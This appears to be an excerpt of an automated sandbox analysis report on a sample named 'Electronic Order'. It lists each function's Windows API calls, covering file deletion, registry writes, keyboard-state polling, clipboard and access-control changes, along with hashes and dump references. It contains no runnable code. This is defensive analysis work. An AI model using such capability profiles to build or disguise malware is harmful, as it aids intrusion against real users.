                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E2CAAF
                                      • __swprintf.LIBCMT ref: 00E2CAFB
                                      • __swprintf.LIBCMT ref: 00E2CB3E
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • __swprintf.LIBCMT ref: 00E2CB92
                                        • Part of subcall function 00DE38D8: __woutput_l.LIBCMT ref: 00DE3931
                                      • __swprintf.LIBCMT ref: 00E2CBE0
                                        • Part of subcall function 00DE38D8: __flsbuf.LIBCMT ref: 00DE3953
                                        • Part of subcall function 00DE38D8: __flsbuf.LIBCMT ref: 00DE396B
                                      • __swprintf.LIBCMT ref: 00E2CC2F
                                      • __swprintf.LIBCMT ref: 00E2CC7E
                                      • __swprintf.LIBCMT ref: 00E2CCCD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3953360268-2428617273
                                      • Opcode ID: 7dbb475dc7caf35aaf7c07d3e1fe4d21e1d3229b525a0ec08cc6466348389e51
                                      • Instruction ID: 0af82fa80693394a488583af410dcc1bce2dea529e3c0baaa3eff840e4e0a22a
                                      • Opcode Fuzzy Hash: 7dbb475dc7caf35aaf7c07d3e1fe4d21e1d3229b525a0ec08cc6466348389e51
                                      • Instruction Fuzzy Hash: 4DA13DB1508345ABC700EBA5D895EAFB7ECEF94700F40492DF586D3191EA34EA09CB72
                                      Function 00E2F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E2F221
                                      • _wcscmp.LIBCMT ref: 00E2F236
                                      • _wcscmp.LIBCMT ref: 00E2F24D
                                      • GetFileAttributesW.KERNEL32(?), ref: 00E2F25F
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00E2F279
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E2F291
                                      • FindClose.KERNEL32(00000000), ref: 00E2F29C
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E2F2B8
                                      • _wcscmp.LIBCMT ref: 00E2F2DF
                                      • _wcscmp.LIBCMT ref: 00E2F2F6
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2F308
                                      • SetCurrentDirectoryW.KERNEL32(00E7A5A0), ref: 00E2F326
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E2F330
                                      • FindClose.KERNEL32(00000000), ref: 00E2F33D
                                      • FindClose.KERNEL32(00000000), ref: 00E2F34F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      • Opcode ID: 51c2d9902e6d54cb1882cc7c8bb036f01219bee229580b05960f0bd81e9b3862
                                      • Instruction ID: 9f14e40c1836ded3268560e5ad7fcac15341392b81b25bb25e9c1159dfaf9629
                                      • Opcode Fuzzy Hash: 51c2d9902e6d54cb1882cc7c8bb036f01219bee229580b05960f0bd81e9b3862
                                      • Instruction Fuzzy Hash: AD31D4765002296FDB10EFB1EC58AEE77BC9F4A725F145175E804F30A0EB70DA458B64
                                      Function 00E40AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40BDE
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E4F910,00000000,?,00000000,?,?), ref: 00E40C4C
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E40C94
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E40D1D
                                      • RegCloseKey.ADVAPI32(?), ref: 00E4103D
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E4104A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: 3dc7e65f8fb0c0ecf8e9bccd829debe94ef59e3c9194c635a71d82582cb7485a
                                      • Instruction ID: 53e3b6940252dfea9af3ebb838f1d860d14956422988a908feba7aaa4336e2fe
                                      • Opcode Fuzzy Hash: 3dc7e65f8fb0c0ecf8e9bccd829debe94ef59e3c9194c635a71d82582cb7485a
                                      • Instruction Fuzzy Hash: CF028E352006019FCB14EF25D895E2AB7E5FF88714F05985DF98AAB362CB30EC45CB61
                                      Function 00E2F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E2F37E
                                      • _wcscmp.LIBCMT ref: 00E2F393
                                      • _wcscmp.LIBCMT ref: 00E2F3AA
                                        • Part of subcall function 00E245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E245DC
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E2F3D9
                                      • FindClose.KERNEL32(00000000), ref: 00E2F3E4
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E2F400
                                      • _wcscmp.LIBCMT ref: 00E2F427
                                      • _wcscmp.LIBCMT ref: 00E2F43E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2F450
                                      • SetCurrentDirectoryW.KERNEL32(00E7A5A0), ref: 00E2F46E
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E2F478
                                      • FindClose.KERNEL32(00000000), ref: 00E2F485
                                      • FindClose.KERNEL32(00000000), ref: 00E2F497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      • Opcode ID: a4b02ccd56dca1dc47ce4a2af8ddb4aee88dc8f404ee2b4c55ce5f85c15f9064
                                      • Instruction ID: c957365b65eb5774212fd8171c52d88e414a07cb0453832dc76c7d0991838d3a
                                      • Opcode Fuzzy Hash: a4b02ccd56dca1dc47ce4a2af8ddb4aee88dc8f404ee2b4c55ce5f85c15f9064
                                      • Instruction Fuzzy Hash: 1131F2765002296FCB10FFA5FC88AEE77BC9F49725F145275E814B30A0DBB0DA45CA64
                                      Function 00E181F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E18766
                                        • Part of subcall function 00E1874A: GetLastError.KERNEL32(?,00E1822A,?,?,?), ref: 00E18770
                                        • Part of subcall function 00E1874A: GetProcessHeap.KERNEL32(00000008,?,?,00E1822A,?,?,?), ref: 00E1877F
                                        • Part of subcall function 00E1874A: HeapAlloc.KERNEL32(00000000,?,00E1822A,?,?,?), ref: 00E18786
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E1879D
                                        • Part of subcall function 00E187E7: GetProcessHeap.KERNEL32(00000008,00E18240,00000000,00000000,?,00E18240,?), ref: 00E187F3
                                        • Part of subcall function 00E187E7: HeapAlloc.KERNEL32(00000000,?,00E18240,?), ref: 00E187FA
                                        • Part of subcall function 00E187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E18240,?), ref: 00E1880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E1825B
                                      • _memset.LIBCMT ref: 00E18270
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1828F
                                      • GetLengthSid.ADVAPI32(?), ref: 00E182A0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E182DD
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E182F9
                                      • GetLengthSid.ADVAPI32(?), ref: 00E18316
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E18325
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E1832C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1834D
                                      • CopySid.ADVAPI32(00000000), ref: 00E18354
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E18385
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E183AB
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E183BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: a3b639d86cb5ad5b3b6c635e867ea8de9ff2f03e80dff94a6684817ed0e3df16
                                      • Instruction ID: 1e89bec27988e533b344c33f3287a901de6b843c5585d379a9213c2ae5fa6196
                                      • Opcode Fuzzy Hash: a3b639d86cb5ad5b3b6c635e867ea8de9ff2f03e80dff94a6684817ed0e3df16
                                      • Instruction Fuzzy Hash: 55616975900209AFDF049FA1DD84AEEBBB9FF04704F04916AE825B6291DB309A45DB60
                                      Function 00DD6843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$PJ$UCP)$UTF)$UTF16)
                                      • API String ID: 0-1624373025
                                      • Opcode ID: da212ef6f6dbaf3fb58b5e9a0806c9711cdba063232acc79377ff7a08f614bc0
                                      • Instruction ID: 874c362223d1b2043422f9e4f7f359ff261652e576f9c0f54c33085f25cee0ce
                                      • Opcode Fuzzy Hash: da212ef6f6dbaf3fb58b5e9a0806c9711cdba063232acc79377ff7a08f614bc0
                                      • Instruction Fuzzy Hash: 44725E75E002199BDB24CF59D8807EEB7B5EF88710F1491ABE959FB380D7709981CBA0
                                      Function 00E40665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40737
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E407D6
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E4086E
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E40AAD
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E40ABA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      • Opcode ID: 8fc471c228c4345d64986f983f35faeddadb111523376ddf8da5f4e95e0d68c8
                                      • Instruction ID: c3f640932be3541b1541ae679c1ef1a41583b8355a4ef1c5c0ff3277dbd8c59d
                                      • Opcode Fuzzy Hash: 8fc471c228c4345d64986f983f35faeddadb111523376ddf8da5f4e95e0d68c8
                                      • Instruction Fuzzy Hash: 2EE17D31204311AFCB14DF25D895E6ABBE4EF89714F04986DF54AEB2A2DB30ED05CB61
                                      Function 00E20219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00E20241
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E202C2
                                      • GetKeyState.USER32(000000A0), ref: 00E202DD
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E202F7
                                      • GetKeyState.USER32(000000A1), ref: 00E2030C
                                      • GetAsyncKeyState.USER32(00000011), ref: 00E20324
                                      • GetKeyState.USER32(00000011), ref: 00E20336
                                      • GetAsyncKeyState.USER32(00000012), ref: 00E2034E
                                      • GetKeyState.USER32(00000012), ref: 00E20360
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E20378
                                      • GetKeyState.USER32(0000005B), ref: 00E2038A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 42d45c8702a56434b5ec5c06ee816d267b9b83b193bb70e14a90907b0a1859b1
                                      • Instruction ID: 12004de3c3dcabf2992217822e478ca92a0ce56b109d1c41968d5c5bc2ec7e66
                                      • Opcode Fuzzy Hash: 42d45c8702a56434b5ec5c06ee816d267b9b83b193bb70e14a90907b0a1859b1
                                      • Instruction Fuzzy Hash: 5941A8345047E9AFFF31DB64A8083A5BFA06F16348F08509ED5C6761D3EBA45DC887A2
                                      Function 00E386D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • CoInitialize.OLE32 ref: 00E38718
                                      • CoUninitialize.OLE32 ref: 00E38723
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00E52BEC,?), ref: 00E38783
                                      • IIDFromString.OLE32(?,?), ref: 00E387F6
                                      • VariantInit.OLEAUT32(?), ref: 00E38890
                                      • VariantClear.OLEAUT32(?), ref: 00E388F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      • Opcode ID: 8ab28a1e459eece3f83642b1696ddb1add9e4e175f131c788e266ce4462a1d8d
                                      • Instruction ID: 434c2006c432392e58df4637ebf258f88d8b79247a71eed9a2a8eb26b9ffbd61
                                      • Opcode Fuzzy Hash: 8ab28a1e459eece3f83642b1696ddb1add9e4e175f131c788e266ce4462a1d8d
                                      • Instruction Fuzzy Hash: 4E61BF706083019FD714DF24CA48F6ABBE4EF89714F54581EF985AB291CB70ED48CBA2
                                      Function 00E34458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: d39bece8e40c5c93a6301b57ba829d676461697a4cf13ceb37e51a58b3e1d84c
                                      • Instruction ID: 6016150ea625f68e97e28b330422539a26c130c36120aced48e6c0971ababe71
                                      • Opcode Fuzzy Hash: d39bece8e40c5c93a6301b57ba829d676461697a4cf13ceb37e51a58b3e1d84c
                                      • Instruction Fuzzy Hash: 3621B779200611AFDB119F21EC1DF6D7BA8EF05B15F11806AF94AE72B1CB70AC01CB94
                                      Function 00E23A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                        • Part of subcall function 00E24CD3: GetFileAttributesW.KERNEL32(?,00E23947), ref: 00E24CD4
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E23ADF
                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E23B87
                                      • MoveFileW.KERNEL32(?,?), ref: 00E23B9A
                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E23BB7
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E23BD9
                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E23BF5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 4002782344-1173974218
                                      • Opcode ID: dc53b0ef7543420e3750dd8de099858bc6c07c4a4475ecb1196c7259c6932a6b
                                      • Instruction ID: 12e4607b88c7f1c77a13444aa3131e5c7cd2cf8e91d4780935bb73ee09162b70
                                      • Opcode Fuzzy Hash: dc53b0ef7543420e3750dd8de099858bc6c07c4a4475ecb1196c7259c6932a6b
                                      • Instruction Fuzzy Hash: 17516B3180115EAACF05EBA1EE92EEDB7B9AF14304F2451A9E40277091DF246F09CFB0
                                      Function 00E2F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E2F6AB
                                      • Sleep.KERNEL32(0000000A), ref: 00E2F6DB
                                      • _wcscmp.LIBCMT ref: 00E2F6EF
                                      • _wcscmp.LIBCMT ref: 00E2F70A
                                      • FindNextFileW.KERNEL32(?,?), ref: 00E2F7A8
                                      • FindClose.KERNEL32(00000000), ref: 00E2F7BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                      • String ID: *.*
                                      • API String ID: 713712311-438819550
                                      • Opcode ID: 4c404bc6f58c92c2ea23bbb2497278292954d1cff27103dc11b050a408753f13
                                      • Instruction ID: 096ea782704f0fcb2447691dc786dd21dae984c6892f772a9630d07dd3dd8eb9
                                      • Opcode Fuzzy Hash: 4c404bc6f58c92c2ea23bbb2497278292954d1cff27103dc11b050a408753f13
                                      • Instruction Fuzzy Hash: 65414B7591021A9FCB11EF64DC89AEEBBB4FF05314F14457AE815B31A1DB309A44CBA0
                                      Function 00DD4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: baf168b0d1049eaca349a376d1ea8cfbe06788dc820cc918c2b0b28a8ea5b062
                                      • Instruction ID: 8295695351b202e372a36b84afe8d4d09c7eaf0b75a4c9021c6dea168519902e
                                      • Opcode Fuzzy Hash: baf168b0d1049eaca349a376d1ea8cfbe06788dc820cc918c2b0b28a8ea5b062
                                      • Instruction Fuzzy Hash: A3A25C74E0421A8BDF24CF58C9907ADB7B1BF55314F1481AAD89AA7380D770AEC5DFA0
                                      Function 00DD58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
